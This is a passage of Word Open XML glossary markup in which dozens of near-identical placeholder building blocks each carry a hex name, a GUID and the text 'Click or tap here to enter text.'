        <w:name w:val="1ED925AF5C9F4EDAA1301A66ACA4B8EB"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{CB22E04E-4659-4D85-A362-49AECB2BBBCE}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D06894" w:rsidRDefault="00DD4250" w:rsidP="00DD4250">
          <w:pPr>
            <w:pStyle w:val="1ED925AF5C9F4EDAA1301A66ACA4B8EB"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="38BB14F76EB644EABEDDE5CA215E676A"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{A211CC3E-0970-483B-89E4-ACF5ED61E065}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D06894" w:rsidRDefault="00DD4250" w:rsidP="00DD4250">
          <w:pPr>
            <w:pStyle w:val="38BB14F76EB644EABEDDE5CA215E676A"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="74F0758DDAFD4E3C88E9D9600A65680A"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{A8B8BD90-1EBA-42F4-9186-C5C06BAD3EF8}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D06894" w:rsidRDefault="00DD4250" w:rsidP="00DD4250">
          <w:pPr>
            <w:pStyle w:val="74F0758DDAFD4E3C88E9D9600A65680A"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="5CEE3EB748284E55992025BAACA04193"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{056B58DD-0DDB-4776-A1B3-76A286C10F5A}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D06894" w:rsidRDefault="00DD4250" w:rsidP="00DD4250">
          <w:pPr>
            <w:pStyle w:val="5CEE3EB748284E55992025BAACA04193"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="3380AB1E226A424DBE9F42DA045327AA"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{3F722E5B-E035-4DE3-BE9E-93770E078F62}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D06894" w:rsidRDefault="00DD4250" w:rsidP="00DD4250">
          <w:pPr>
            <w:pStyle w:val="3380AB1E226A424DBE9F42DA045327AA"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="686BF089BED3442EABBADBA36EF2E909"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{325E3DE6-88B0-4A93-A280-DD3ABF52881A}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D06894" w:rsidRDefault="00DD4250" w:rsidP="00DD4250">
          <w:pPr>
            <w:pStyle w:val="686BF089BED3442EABBADBA36EF2E909"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="EB9CCA32BA4249328C702FE54D344D68"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{87293667-BE20-4AE1-B36A-0D05E21C567E}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D06894" w:rsidRDefault="00DD4250" w:rsidP="00DD4250">
          <w:pPr>
            <w:pStyle w:val="EB9CCA32BA4249328C702FE54D344D68"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="82DD7323F7EA4915A4766D830C41E241"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{D7C7A600-75BC-41CB-B0DE-8371BEA38DF9}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D06894" w:rsidRDefault="00DD4250" w:rsidP="00DD4250">
          <w:pPr>
            <w:pStyle w:val="82DD7323F7EA4915A4766D830C41E241"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="86C928A70B2941EDA3AB438405B65E10"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{5FF42DF2-1AAE-4F92-97F5-B65108DA6207}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D06894" w:rsidRDefault="00DD4250" w:rsidP="00DD4250">
          <w:pPr>
            <w:pStyle w:val="86C928A70B2941EDA3AB438405B65E10"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="3B56EF27566D4DF98A267FCD71310D6E"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{088180BE-3BD5-4D5B-A480-654C6C067E5D}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D06894" w:rsidRDefault="00DD4250" w:rsidP="00DD4250">
          <w:pPr>
            <w:pStyle w:val="3B56EF27566D4DF98A267FCD71310D6E"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="1511413C552041E4AFC1546F8299E560"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{F59ADD2C-193D-4D65-BC0C-27734C4299D8}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D06894" w:rsidRDefault="00DD4250" w:rsidP="00DD4250">
          <w:pPr>
            <w:pStyle w:val="1511413C552041E4AFC1546F8299E560"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="A6A01364A42641DC9865DC5FAC166B88"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{9A2CF42D-B00E-4FED-A8A1-BAD76F38BB2A}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D06894" w:rsidRDefault="00DD4250" w:rsidP="00DD4250">
          <w:pPr>
            <w:pStyle w:val="A6A01364A42641DC9865DC5FAC166B88"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="267845E1777A40589686BB6B3CD81B20"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{3552356D-BDF0-4866-A363-B6D0E3F6FC8E}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D06894" w:rsidRDefault="00DD4250" w:rsidP="00DD4250">
          <w:pPr>
            <w:pStyle w:val="267845E1777A40589686BB6B3CD81B20"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="5F54E9EB21B8419C91ADE62F933935BF"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{C0151217-A69C-4F79-8D91-38AA6A8A2BD8}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D06894" w:rsidRDefault="00DD4250" w:rsidP="00DD4250">
          <w:pPr>
            <w:pStyle w:val="5F54E9EB21B8419C91ADE62F933935BF"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="B3C388D15E8B4130AC3BEDAFBB4E3FAF"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{429CA82C-E20D-494A-A9E1-7EA7E8EFC296}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D06894" w:rsidRDefault="00DD4250" w:rsidP="00DD4250">
          <w:pPr>
            <w:pStyle w:val="B3C388D15E8B4130AC3BEDAFBB4E3FAF"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="ED0956A66DF2475F9F7BE07D20875025"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{FFD5EAD4-39B8-4D88-8B23-7DEF053426F5}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D06894" w:rsidRDefault="00DD4250" w:rsidP="00DD4250">
          <w:pPr>
            <w:pStyle w:val="ED0956A66DF2475F9F7BE07D20875025"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="7397539074E84AFBB931612F0F5475BA"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{4280FE96-06F4-4F21-A38E-6E713B30F6F7}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D06894" w:rsidRDefault="00DD4250" w:rsidP="00DD4250">
          <w:pPr>
            <w:pStyle w:val="7397539074E84AFBB931612F0F5475BA"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="87C3013135E148688EF88088F98624CE"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{894518CC-D60A-40FF-B733-DBD4056D31F5}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D06894" w:rsidRDefault="00DD4250" w:rsidP="00DD4250">
          <w:pPr>
            <w:pStyle w:val="87C3013135E148688EF88088F98624CE"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="DC835E879B9F4859AB833F53C7A05C0C"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{20BE2EBC-D43B-45BD-98F4-A1AE0AB6EB8E}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D06894" w:rsidRDefault="00DD4250" w:rsidP="00DD4250">
          <w:pPr>
            <w:pStyle w:val="DC835E879B9F4859AB833F53C7A05C0C"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="29F6BD7097A146A0A8DD8AFBD250346D"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{78413ABE-DCD6-473D-BBB6-A0B13E8F87DA}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D06894" w:rsidRDefault="00DD4250" w:rsidP="00DD4250">
          <w:pPr>
            <w:pStyle w:val="29F6BD7097A146A0A8DD8AFBD250346D"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="984429ACD67B49A2A8DAF721F44D2A10"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{E9FE5ACE-4304-404C-A37A-E3920FC05DE3}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D06894" w:rsidRDefault="00DD4250" w:rsidP="00DD4250">
          <w:pPr>
            <w:pStyle w:val="984429ACD67B49A2A8DAF721F44D2A10"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="01109C8489BC41E4A1675961AAF9358E"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{8D785130-F9C2-4EF1-BC17-C881E2152D87}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D06894" w:rsidRDefault="00DD4250" w:rsidP="00DD4250">
          <w:pPr>
            <w:pStyle w:val="01109C8489BC41E4A1675961AAF9358E"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="D52EBDF8CE594C3B94ACD118B53923E2"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{8D01194E-6587-4704-BCB8-8ABA4EA35249}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D06894" w:rsidRDefault="00DD4250" w:rsidP="00DD4250">
          <w:pPr>
            <w:pStyle w:val="D52EBDF8CE594C3B94ACD118B53923E2"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="D10E686430A949C7959AF889B704E437"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{E289080D-26C0-46A8-A762-A0C7283641A5}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D06894" w:rsidRDefault="00DD4250" w:rsidP="00DD4250">
          <w:pPr>
            <w:pStyle w:val="D10E686430A949C7959AF889B704E437"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="0A61E21E7CD1410CBD1B21B72B0CE228"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{2EE8AA36-14C6-4D29-9F98-09401AC32B1B}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D06894" w:rsidRDefault="00DD4250" w:rsidP="00DD4250">
          <w:pPr>
            <w:pStyle w:val="0A61E21E7CD1410CBD1B21B72B0CE228"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="C83EA514D44441A5A7DD2B40685501E8"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{F302F5D7-6FEE-4606-A754-4C584E26F5F6}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D06894" w:rsidRDefault="00DD4250" w:rsidP="00DD4250">
          <w:pPr>
            <w:pStyle w:val="C83EA514D44441A5A7DD2B40685501E8"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="50B08E4EF1DA4D46855CF7FA2AB53DEC"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{536C131E-849D-4235-8F23-890B5208B648}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D06894" w:rsidRDefault="00DD4250" w:rsidP="00DD4250">
          <w:pPr>
            <w:pStyle w:val="50B08E4EF1DA4D46855CF7FA2AB53DEC"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="E4F36745AA624AF1B0E8AAE8098079C1"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{C818D3D4-969A-42E1-8C61-B601A4215378}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D06894" w:rsidRDefault="00DD4250" w:rsidP="00DD4250">
          <w:pPr>
            <w:pStyle w:val="E4F36745AA624AF1B0E8AAE8098079C1"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="E72DEEFACCD04F38BC6593CC22719A48"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{8DC36481-1C28-4462-9A77-FBA2A355C369}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D06894" w:rsidRDefault="00DD4250" w:rsidP="00DD4250">
          <w:pPr>
            <w:pStyle w:val="E72DEEFACCD04F38BC6593CC22719A48"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="557368C1287E4D17BE989CE96B47CFB4"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{8C724AE1-FEA9-4FD4-B5CB-95F3281CBDC9}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D06894" w:rsidRDefault="00DD4250" w:rsidP="00DD4250">
          <w:pPr>
            <w:pStyle w:val="557368C1287E4D17BE989CE96B47CFB4"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="3EFBBE7E0F354F4B83CAAA47A1DE07B4"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{C14EB157-3776-40AF-AFE0-7487D93A8720}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D06894" w:rsidRDefault="00DD4250" w:rsidP="00DD4250">
          <w:pPr>
            <w:pStyle w:val="3EFBBE7E0F354F4B83CAAA47A1DE07B4"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="376174F0CE34467184B8C93A085DA6C2"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{F8CB07F7-AE03-465C-ACE8-837FA81DA51D}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D06894" w:rsidRDefault="00DD4250" w:rsidP="00DD4250">
          <w:pPr>
            <w:pStyle w:val="376174F0CE34467184B8C93A085DA6C2"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="BC6DCBA513504282B3F22CD21D47555A"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{DD2747ED-2766-4A01-8C66-5C3EA71E47B4}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D06894" w:rsidRDefault="00DD4250" w:rsidP="00DD4250">
          <w:pPr>
            <w:pStyle w:val="BC6DCBA513504282B3F22CD21D47555A"/>
          </w:pPr>
